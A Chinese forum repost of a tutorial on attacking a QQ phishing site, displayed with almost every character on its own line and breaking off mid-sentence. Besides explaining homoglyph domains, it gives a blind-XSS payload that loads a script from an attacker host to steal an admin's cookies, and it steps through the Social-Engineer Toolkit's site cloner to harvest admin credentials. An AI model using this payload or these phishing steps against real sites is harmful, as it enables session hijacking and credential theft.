论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
IOT
[21413] 2020-11-15_XSS实战攻击思路总结
文档创建者:
s7ckTeam
浏览次数:
6
最后更新:
2025-01-18
IOT
6 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2020-11-15_XSS实战攻击思路总结
X
S
S
实
战
攻
击
思
路
总
结
转
自
H
A
C
K
之
道
L
e
m
o
n
S
e
c
2
0
2
0
-
1
1
-
1
5
前
言
前
言
前
几
天
看
到
B
站
u
p
主
公
孙
田
浩
投
稿
的
视
频
「
Q
Q
被
盗
后
发
布
赌
博
广
告
,
我
一
气
之
下
黑
了
他
们
网
站
」
,
看
完
后
不
禁
感
叹
为
啥
自
己
没
有
那
么
好
的
运
气
.
.
.
.
.
.
实
际
上
这
就
是
一
个
中
规
中
矩
的
X
S
S
漏
洞
案
例
,
在
安
全
圈
子
里
面
应
该
也
算
是
基
本
操
作
,
正
好
博
客
以
前
没
有
记
录
过
类
似
的
文
章
,
那
么
本
文
就
来
还
原
一
下
这
个
攻
击
过
程
。
鉴
别
网
站
鉴
别
网
站
下
面
是
一
个
经
典
的
Q
Q
空
间
钓
鱼
网
站
:
域
名
分
析
域
名
分
析
钓
鱼
网
站
最
直
观
的
就
是
看
域
名
,
可
以
看
到
目
标
网
站
域
名
:
q
q
.
x
p
s
.
c
o
m
尽
管
域
名
中
出
现
了
q
q
字
样
,
但
是
一
级
域
名
却
是
x
p
s
.
c
o
m
这
一
点
就
直
接
暴
露
了
钓
鱼
网
站
的
本
性
。
早
期
还
有
一
种
利
用
拉
丁
字
母
利
用
拉
丁
字
母
注
册
的
域
名
伪
造
钓
鱼
网
站
的
案
例
,
这
种
就
比
较
逼
真
了
,
下
面
国
光
简
单
列
举
一
些
:
O
P
P
O
官
网
官
网
真
假
域
名
真
假
域
名
#
真
域
名
w
w
w
.
o
p
p
o
.
c
o
m
#
假
域
名
w
w
w
.
ο
p
p
ο
.
c
o
m
P
o
r
n
h
u
b
官
网
真
假
域
名
官
网
真
假
域
名
#
真
域
名
w
w
w
.
p
o
r
n
h
u
b
.
c
o
m
#
假
域
名
w
w
w
.
ρ
o
r
n
h
u
b
.
c
o
m
唯
品
会
官
网
唯
品
会
官
网
真
假
域
名
真
假
域
名
#
真
域
名
w
w
w
.
v
i
p
.
c
o
m
#
假
域
名
w
w
w
.
ν
i
p
.
c
o
m
关
于
这
类
域
名
就
不
再
列
举
了
,
早
期
这
种
方
法
成
功
率
是
非
常
的
高
的
,
有
时
候
甚
至
都
可
以
欺
骗
到
我
们
这
种
专
业
的
信
息
安
全
从
业
者
。
功
能
分
析
功
能
分
析
钓
鱼
网
站
既
然
是
要
钓
鱼
的
话
,
说
那
么
多
半
还
会
有
后
台
管
理
功
能
。
所
以
使
用
常
规
的
目
录
扫
描
工
具
多
半
可
以
扫
描
出
一
些
端
倪
出
来
:
d
i
r
s
e
a
r
c
h
-
u
"
h
t
t
p
:
/
/
q
q
.
x
p
s
.
c
o
m
/
"
-
e
*
-
x
3
0
1
果
然
扫
描
出
了
这
个
Q
Q
空
间
钓
鱼
网
站
的
后
台
登
录
口
了
:
h
t
t
p
:
/
/
q
q
.
x
p
s
.
c
o
m
/
a
d
m
i
n
/
l
o
g
i
n
.
p
h
p
至
此
基
本
上
已
经
可
以
确
定
这
个
目
标
网
站
就
是
传
说
中
的
钓
鱼
网
站
了
,
下
面
来
看
一
下
这
个
钓
鱼
网
站
是
如
何
运
作
的
吧
。
钓
鱼
流
程
钓
鱼
流
程
小
白
用
户
前
台
输
入
自
己
的
Q
Q
账
号
和
密
码
信
息
,
点
击
登
录
后
域
名
跳
转
到
真
正
的
Q
Q
官
网
:
然
后
用
户
再
输
入
自
己
的
Q
Q
账
号
和
密
码
就
可
以
成
功
登
陆
了
。
目
前
很
多
钓
鱼
网
站
都
是
这
种
思
路
,
这
可
以
让
被
钓
者
产
生
一
种
自
己
第
一
次
是
密
码
不
小
心
输
入
错
误
的
错
觉
,
从
而
放
松
警
惕
,
妙
啊
!
真
是
妙
蛙
种
子
吃
着
妙
脆
角
,
妙
进
了
米
奇
妙
妙
屋
妙
到
家
了
然
后
钓
鱼
网
站
的
管
理
员
每
天
会
到
自
己
的
Q
Q
空
间
钓
鱼
管
理
中
心
里
面
看
看
今
天
又
有
哪
些
菜
鸡
上
钩
了
:
可
以
看
到
上
钩
者
的
Q
Q
号
为
:
1
3
1
4
5
2
0
密
码
为
:
s
b
h
a
c
.
.
.
唉
,
不
对
劲
?
貌
似
自
己
被
羞
辱
了
一
番
.
.
.
.
.
.
攻
击
思
路
攻
击
思
路
本
文
主
要
是
来
梳
理
一
下
X
S
S
常
剑
的
攻
击
思
路
,
关
于
X
S
S
以
为
的
思
路
不
在
本
文
的
叙
述
范
围
内
,
另
外
如
果
有
小
伙
伴
要
不
错
新
的
姿
势
的
话
欢
迎
评
论
区
里
面
或
者
邮
件
留
言
,
国
光
日
后
会
继
续
完
善
本
文
的
。
思
路
一
:
思
路
一
:
X
S
S
盲
打
盲
打
如
果
目
标
网
站
存
在
X
S
S
的
话
且
没
有
h
t
t
p
o
n
l
y
防
御
c
o
o
k
i
e
那
么
就
可
以
直
接
盲
打
X
S
S
。
首
先
准
备
一
个
X
S
S
靶
场
,
国
光
这
里
比
较
推
荐
G
i
t
h
u
b
上
面
开
源
的
蓝
莲
花
X
S
S
平
台
。
官
方
项
目
地
址
为
:
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
f
i
r
e
s
u
n
C
N
/
B
l
u
e
L
o
t
u
s
_
X
S
S
R
e
c
e
i
v
e
r
可
惜
已
经
清
空
数
据
了
,
还
好
国
光
我
f
o
r
k
了
一
份
:
国
光
f
o
r
k
的
项
目
地
址
为
:
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
s
q
l
s
e
c
/
B
l
u
e
L
o
t
u
s
_
X
S
S
R
e
c
e
i
v
e
r
然
后
使
用
X
S
S
平
台
里
面
的
模
块
来
生
成
一
个
X
S
S
p
a
y
l
o
a
d
:
<
s
c
r
i
p
t
s
r
c
=
"
h
t
t
p
:
/
/
1
0
.
2
0
.
2
4
.
2
4
4
/
x
s
s
/
m
y
j
s
/
x
.
j
s
"
>
<
/
s
c
r
i
p
t
>
可
以
去
掉
多
余
的
双
引
号
:
<
s
c
r
i
p
t
s
r
c
=
h
t
t
p
:
/
/
1
0
.
2
0
.
2
4
.
2
4
4
/
x
s
s
/
m
y
j
s
/
x
.
j
s
>
<
/
s
c
r
i
p
t
>
然
后
回
到
钓
鱼
网
站
前
台
,
在
用
户
名
或
者
密
码
出
插
入
p
a
y
l
o
a
d
(
理
论
上
来
说
密
码
处
成
功
率
要
高
一
点
)
,
如
果
有
表
单
长
度
限
制
的
话
,
可
以
手
工
审
查
元
素
修
改
i
n
p
u
t
的
长
度
限
制
:
这
样
黑
客
攻
击
的
步
骤
基
本
上
就
走
完
了
,
下
面
回
到
钓
鱼
网
站
管
理
员
的
视
角
。
钓
鱼
网
站
的
搭
建
者
到
自
己
的
Q
Q
空
间
钓
鱼
管
理
中
心
里
面
看
看
今
天
又
有
哪
些
菜
鸡
上
钩
了
:
发
现
真
的
有
菜
鸡
上
钩
,
密
码
居
然
是
1
1
1
1
1
1
1
1
1
1
嘴
角
忍
不
住
上
仰
。
此
时
他
不
知
道
的
是
,
用
户
账
号
旁
边
实
际
上
有
一
串
J
S
代
码
被
解
析
了
,
而
此
时
黑
客
在
X
S
S
平
台
里
面
可
以
直
接
看
到
管
理
员
已
经
上
钩
了
:
可
以
直
接
看
到
管
理
员
的
后
台
地
址
和
c
o
o
k
i
e
信
息
,
拿
到
后
台
地
址
和
C
o
o
k
i
e
信
息
就
可
以
直
接
抓
包
替
换
C
o
o
k
i
e
登
录
到
钓
鱼
网
站
的
后
台
,
这
些
基
本
操
作
国
光
我
就
不
在
啰
嗦
了
,
下
面
来
说
一
下
另
一
种
思
路
。
思
路
二
:
思
路
二
:
S
E
T
钓
鱼
钓
鱼
假
设
目
标
网
站
存
在
h
t
t
p
p
n
l
y
的
话
,
我
们
拿
到
的
c
o
o
k
i
e
信
息
也
是
不
完
整
的
,
所
以
传
统
的
思
路
是
行
不
通
的
,
这
种
情
况
下
该
怎
么
办
呢
?
仔
细
想
想
,
既
然
不
能
正
面
肛
h
t
t
p
o
n
l
y
的
话
,
那
么
为
什
么
不
考
虑
绕
过
他
呢
?
下
面
国
光
主
要
描
述
一
下
如
何
使
用
K
a
l
i
L
i
n
u
x
里
面
的
s
e
t
社
工
工
程
学
工
具
包
来
进
行
钓
鱼
。
S
E
T
在
K
a
l
i
L
i
n
u
x
里
面
的
全
称
是
s
o
c
i
a
l
e
n
g
i
n
e
e
r
i
n
g
t
o
o
l
k
i
t
:
G
i
t
h
u
b
项
目
地
址
为
项
目
地
址
为
:
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
t
r
u
s
t
e
d
s
e
c
/
s
o
c
i
a
l
-
e
n
g
i
n
e
e
r
-
t
o
o
l
k
i
t
点
击
即
可
直
接
启
动
,
首
先
会
看
到
如
下
的
菜
单
:
S
e
l
e
c
t
f
r
o
m
t
h
e
m
e
n
u
:
1
)
S
o
c
i
a
l
-
E
n
g
i
n
e
e
r
i
n
g
A
t
t
a
c
k
s
#
社
会
工
程
攻
击
2
)
P
e
n
e
t
r
a
t
i
o
n
T
e
s
t
i
n
g
(
F
a
s
t
-
T
r
a
c
k
)
#
渗
透
测
试
(
快
速
通
道
)
3
)
T
h
i
r
d
P
a
r
t
y
M
o
d
u
l
e
s
#
第
三
方
模
块
4
)
U
p
d
a
t
e
t
h
e
S
o
c
i
a
l
-
E
n
g
i
n
e
e
r
T
o
o
l
k
i
t
#
更
新
S
E
T
5
)
U
p
d
a
t
e
S
E
T
c
o
n
f
i
g
u
r
a
t
i
o
n
#
更
新
S
E
T
配
置
6
)
H
e
l
p
,
C
r
e
d
i
t
s
,
a
n
d
A
b
o
u
t
#
帮
助
9
9
)
E
x
i
t
t
h
e
S
o
c
i
a
l
-
E
n
g
i
n
e
e
r
T
o
o
l
k
i
t
#
退
出
s
e
t
>
1
选
择
1
后
进
入
到
下
面
的
菜
单
:
S
e
l
e
c
t
f
r
o
m
t
h
e
m
e
n
u
:
1
)
S
p
e
a
r
-
P
h
i
s
h
i
n
g
A
t
t
a
c
k
V
e
c
t
o
r
s
#
鱼
叉
式
网
络
钓
鱼
攻
击
2
)
W
e
b
s
i
t
e
A
t
t
a
c
k
V
e
c
t
o
r
s
#
网
站
攻
击
3
)
I
n
f
e
c
t
i
o
u
s
M
e
d
i
a
G
e
n
e
r
a
t
o
r
#
感
染
性
介
质
生
成
4
)
C
r
e
a
t
e
a
P
a
y
l
o
a
d
a
n
d
L
i
s
t
e
n
e
r
#
创
建
P
a
y
l
o
a
d
和
监
听
器
5
)
M
a
s
s
M
a
i
l
e
r
A
t
t
a
c
k
#
群
发
邮
件
6
)
A
r
d
u
i
n
o
-
B
a
s
e
d
A
t
t
a
c
k
V
e
c
t
o
r
#
基
于
A
r
d
u
i
n
o
的
攻
击
7
)
W
i
r
e
l
e
s
s
A
c
c
e
s
s
P
o
i
n
t
A
t
t
a
c
k
V
e
c
t
o
r
#
无
线
接
入
点
攻
击
8
)
Q
R
C
o
d
e
G
e
n
e
r
a
t
o
r
A
t
t
a
c
k
V
e
c
t
o
r
#
二
维
码
生
成
器
攻
击
9
)
P
o
w
e
r
s
h
e
l
l
A
t
t
a
c
k
V
e
c
t
o
r
s
#
P
o
w
e
r
s
h
e
l
l
攻
击
1
0
)
T
h
i
r
d
P
a
r
t
y
M
o
d
u
l
e
s
#
第
三
方
模
块
9
9
)
R
e
t
u
r
n
b
a
c
k
t
o
t
h
e
m
a
i
n
m
e
n
u
.
#
返
回
主
菜
单
s
e
t
>
2
选
择
2
后
进
入
到
下
面
的
菜
单
:
1
)
J
a
v
a
A
p
p
l
e
t
A
t
t
a
c
k
M
e
t
h
o
d
#
J
a
v
a
A
p
p
l
e
t
攻
击
2
)
M
e
t
a
s
p
l
o
i
t
B
r
o
w
s
e
r
E
x
p
l
o
i
t
M
e
t
h
o
d
#
M
e
t
a
s
p
l
o
i
t
B
r
o
w
s
e
r
浏
览
器
攻
击
3
)
C
r
e
d
e
n
t
i
a
l
H
a
r
v
e
s
t
e
r
A
t
t
a
c
k
M
e
t
h
o
d
#
凭
证
窃
取
攻
击
4
)
T
a
b
n
a
b
b
i
n
g
A
t
t
a
c
k
M
e
t
h
o
d
#
标
签
页
劫
持
5
)
W
e
b
J
a
c
k
i
n
g
A
t
t
a
c
k
M
e
t
h
o
d
#
网
页
劫
持
攻
击
6
)
M
u
l
t
i
-
A
t
t
a
c
k
W
e
b
M
e
t
h
o
d
#
综
合
网
页
攻
击
7
)
H
T
A
A
t
t
a
c
k
M
e
t
h
o
d
#
H
T
A
攻
击
9
9
)
R
e
t
u
r
n
t
o
M
a
i
n
M
e
n
u
#
返
回
主
菜
单
s
e
t
:
w
e
b
a
t
t
a
c
k
>
3
选
择
3
进
入
到
下
面
的
菜
单
:
1
)
W
e
b
T
e
m
p
l
a
t
e
s
#
网
站
模
板
2
)
S
i
t
e
C
l
o
n
e
r
#
站
点
克
隆
3
)
C
u
s
t
o
m
I
m
p
o
r
t
#
自
定
义
导
入
9
9
)
R
e
t
u
r
n
t
o
W
e
b
a
t
t
a
c
k
M
e
n
u
#
返
回
主
菜
单
s
e
t
:
w
e
b
a
t
t
a
c
k
>
2
选
择
2
然
后
具
体
看
下
下
面
的
操
作
:
这
个
时
候
一
个
假
的
钓
鱼
网
站
就
制
作
完
成
了
,
访
问
K
a
l
i
L
i
n
u
x
的
8
0
端
1
0
.
2
0
.
2
5
.
3
9
效
果
如
下
:
这
个
登
录
入
口
和
q
q
.
x
p
s
.
c
o
m
/
a
d
m
i
n
/
l
o
g
i
n
.
p
h
p
的
登
录
口
一
模
一
样
:
现
在
的
任
务
就
是
想
办
法
让
管
理
员
在
假
的
网
站
里
面
输
入
网
站
的
后
台
用
户
名
和
密
码
信
息
,
那
么
该
怎
么
诱
导
管
理
员
点
击
呢
?
对
,
聪
明
的
网
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
IOT